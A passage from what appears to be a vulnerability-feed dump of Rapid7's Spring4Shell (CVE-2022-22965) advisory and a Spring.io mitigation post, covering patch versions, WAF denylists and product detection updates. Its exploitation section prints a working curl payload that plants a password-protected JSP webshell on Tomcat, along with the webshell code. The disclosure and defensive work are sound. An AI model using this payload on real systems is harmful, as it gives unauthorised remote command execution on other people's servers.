InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### Application Security\n\nA block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy. tCell will also detect certain types of exploitation attempts based on publicly available payloads, and will also alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application.\n\nInsightAppSec customers can scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) released April 1, 2022. For guidance on securing applications against Spring4Shell, read our [blog here](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>).\n\n### Cloud Security\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nIf the vulnerability is detected in a customer environment, they can leverage filters in InsightCloudSec to focus specifically on the highest risk resources, such as those on a public subnet, to help prioritize remediation. Users can also create a bot to either automatically notify resource owners of the existence of the vulnerability or automatically shut down vulnerable instances in their environment.\n\n### InsightIDR and Managed Detection and Response\n\nWhile InsightIDR does not have a direct detection available for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity.\n\n## Introduction\n\nOur team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.\n\nWhile Rapid7 does not have a direct detection in place for this exploit, we do have behavior- based detection mechanisms in place to alert on common follow-on attacker activity. tCell will also detect certain types of exploitation based on publicly available payloads.\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates. Our next update will be at noon EDT on March 31, 2022.\n\nOn March 30, 2022, rumors began to circulate about an unpatched remote code execution vulnerability in Spring Framework when a Chinese-speaking [researcher](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>) published a [GitHub commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014, that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u200b\u200b\u2026there are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim for organizations that have large deployments of the core Spring Framework or are in use for business critical applications we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nReferenced previously and reported elsewhere for organizations that have WAF technology, string filters offer an effective deterrent, "class._", "Class._", "_.class._", and "_.Class._". These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case any invocation containing \u201cclass\u201d. Praetorian example is provided below. The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class._", "Class._", "_.class._", "_.Class._"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE 2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "spring": [{"lastseen": "2022-04-27T14:58:04", "description": "Yesterday we [announced](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) a Spring Framework RCE vulnerability [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), listing Apache Tomcat as one of several preconditions. The Apache Tomcat team has since released versions **10.0.20**, **9.0.62**, and **8.5.78** all of which close the attack vector on Tomcat's side. While the vulnerability is not in Tomcat itself, in real world situations, it is important to be able to choose among multiple upgrade paths that in turn provides flexibility and layered protection. \n\nUpgrading to Spring Framework **5.3.18+** or **5.2.20+** continues to be our main recommendation not only because it addresses the root cause and prevents other possible attack vectors, but also because it adds protection for other CVEs addressed since the current version in use. \n\nFor older, unsupported versions of the Spring Framework, the Tomcat releases provide an adequate solution for the reported attack vector. Nevertheless, we must stress that this should only be seen as a tactical solution, while the main goal should still be to upgrade to a currently [supported Spring Framework version](<https://github.com/spring-projects/spring-framework/wiki/Spring-Framework-Versions>) as soon as possible.\n\nLast but not least, it's worth mentioning that downgrading to Java 8 provides another viable workaround, which may be another tactical solution option.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T11:49:00", "type": "spring", "title": "Spring Framework RCE, Mitigation Alternative", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T11:49:00", "id": "SPRING:EA9C08B2E57AC70E90A896D25F4A8BEE", "href": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-30T10:55:16", "description": "**Updates**\n\n * **[04-13]** ["Data Binding Rules Vulnerability CVE-2022-22968"](<https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968>) follow-up blog post published, related to the "disallowedFields" from the Suggested Workarounds\n * **[04-08]** [Snyk announces](<https://snyk.io/blog/spring4shell-rce-vulnerability-glassfish-payara/>) an additional attack vector for Glassfish and Payara. See also related Payara, upcoming release [announcement](<https://blog.payara.fish/payara-and-spring4shell>)\n * **[04-04]** Updated [Am I Impacted](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>) with improved description for deployment requirements\n * **[04-01]** Updated [Am I Impacted](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#am-i-impacted>) with additional notes\n * **[04-01]** Updated [Suggested Workarounds](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement#suggested-workarounds>) section for Apache Tomcat upgrades and Java 8 downgrades\n * **[04-01]** ["Mitigation Alternative"](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>) follow-up blog post published, announcing Apache Tomcat releases versions **10.0.20**, **9.0.62**, and **8.5.78** that close the attack vector on Tomcat\u2019s side\n * **[03-31]** [Spring Boot 2.6.6](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available\n * **[03-31]** [Spring Boot 2.5.12](<https://spring.io/blog/2022/03/31/spring-boot-2-5-12-available-now>) is available\n * **[03-31]** [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>) is published\n * **[03-31]** Added section "Misconceptions"\n * **[03-31]** Added section "Am I Impacted"\n * **[03-31]** Fix minor issue in the workaround for adding `disallowedFields`\n * **[03-31]** Spring Framework **5.3.18** and **5.2.20** are available\n\n## Table of Contents\n\n * Overview\n * Vulnerability\n * Am I Impacted\n * Status\n * Suggested Workarounds\n * Misconceptions\n\n### Overview\n\nI would like to announce an RCE vulnerability in the Spring Framework that was leaked out ahead of CVE publication. The issue was first reported to VMware late on Tuesday evening, close to Midnight, GMT time by codeplutos, meizjm3i of AntGroup FG. On Wednesday we worked through investigation, analysis, identifying a fix, testing, while aiming for emergency releases on Thursday. In the mean time, also on Wednesday, details were leaked in full detail online, which is why we are providing this update ahead of the releases and the CVE report.\n\n### Vulnerability\n\nThe vulnerability impacts Spring MVC and Spring WebFlux applications running on JDK 9+. The specific exploit requires the application to be packaged and deployed as a traditional WAR on a Servlet container. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.\n\n### Am I Impacted?\n\nThese are the requirements for the specific scenario from the report:\n\n * Running on JDK 9 or higher\n * [Packaged as a traditional WAR](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#howto.traditional-deployment>) and deployed on a standalone Servlet container. Typical Spring Boot deployments using [an embedded Servlet container](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#features.developing-web-applications.embedded-container>) or [reactive web server](<https://docs.spring.io/spring-boot/docs/2.5.x/reference/htmlsingle/#features.developing-web-applications.reactive-server>) are not impacted.\n * `spring-webmvc` or `spring-webflux` dependency.\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions.\n\nAdditional notes:\n\n * The vulnerability involves `ClassLoader` access and depends on the actual Servlet Container in use. Tomcat 10.0.19, 9.0.61, 8.5.77, and earlier versions are known to be vulnerable. Payara and Glassfish are also known to be vulnerable. Other Servlet containers may also be vulnerable.\n * The issue relates to data binding used to populate an object from request parameters (either query parameters or form data). Data binding is used for controller method parameters that are annotated with `@ModelAttribute` or optionally without it, and without any other Spring Web annotation.\n * The issues does not relate to `@RequestBody` controller method parameters (e.g. JSON deserialization). However, such methods may still be vulnerable if they have another method parameter populated via data binding from query parameters.\n\n### Status\n\n * Spring Framework 5.3.18 and 5.2.20, which contain the fixes, have been released.\n * Spring Boot 2.6.6 and 2.5.12 that depend on Spring Framework 5.3.18 have been released.\n * [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>) has been published.\n * Apache Tomcat has released versions 10.0.20, 9.0.62, and 8.5.78 which close the attack vector on Tomcat\u2019s side, see [Spring Framework RCE, Mitigation Alternative](<https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative>).\n\n### Suggested Workarounds\n\nThe preferred response is to update to Spring Framework **5.3.18** and **5.2.20** or greater. If you have done this, then no workarounds are necessary. However, some may be in a position where upgrading is not possible to do quickly. For that reason, we have provided some workarounds below.\n\n * Upgrading Tomcat\n * Downgrading to Java 8\n * Disallowed Fields\n\nPlease note that, workarounds are not necessarily mutually exclusive since security is best done "in depth".\n\n#### Upgrading Tomcat\n\nFor older applications, running on Tomcat with an unsupported Spring Framework version, upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78**, provides adequate protection. However, this should be seen as a tactical solution, and the main goal should be to upgrade to a currently supported Spring Framework version as soon as possible. If you take this approach, you should consider setting Disallowed Fields as well for defense in depth approach.\n\n#### Downgrading to Java 8\n\nDowngrading to Java 8 is a viable workaround, if you can neither upgrade the Spring Framework nor upgrade Apache Tomcat. \n\n#### Disallowed Fields\n\nAnother viable workaround is to disable binding to particular fields by setting `disallowedFields`on `WebDataBinder` globally:\n \n \n \n @ControllerAdvice\n @Order(Ordered.LOWEST_PRECEDENCE)\n public class BinderControllerAdvice {\n \n @InitBinder\n public void setAllowedFields(WebDataBinder dataBinder) {\n String[] denylist = new String[]{\"class.*\", \"Class.*\", \"*.class.*\", \"*.Class.*\"};\n dataBinder.setDisallowedFields(denylist);\n }\n \n }\n \n\nThis works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.\n\nTo apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux).\n\nFor example in Spring MVC (and similar in WebFlux):\n \n \n package car.app;\n \n import java.util.ArrayList;\n import java.util.Arrays;\n import java.util.List;\n \n import org.springframework.boot.SpringApplication;\n import org.springframework.boot.autoconfigure.SpringBootApplication;\n import org.springframework.boot.autoconfigure.web.servlet.WebMvcRegistrations;\n import org.springframework.context.annotation.Bean;\n import org.springframework.web.bind.ServletRequestDataBinder;\n import org.springframework.web.context.request.NativeWebRequest;\n import org.springframework.web.method.annotation.InitBinderDataBinderFactory;\n import org.springframework.web.method.support.InvocableHandlerMethod;\n import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter;\n import org.springframework.web.servlet.mvc.method.annotation.ServletRequestDataBinderFactory;\n \n \n @SpringBootApplication\n public class MyApp {\n \n \n \tpublic static void main(String[] args) {\n \t\tSpringApplication.run(CarApp.class, args);\n \t}\n \n \n \t@Bean\n \tpublic WebMvcRegistrations mvcRegistrations() {\n \t\treturn new WebMvcRegistrations() {\n 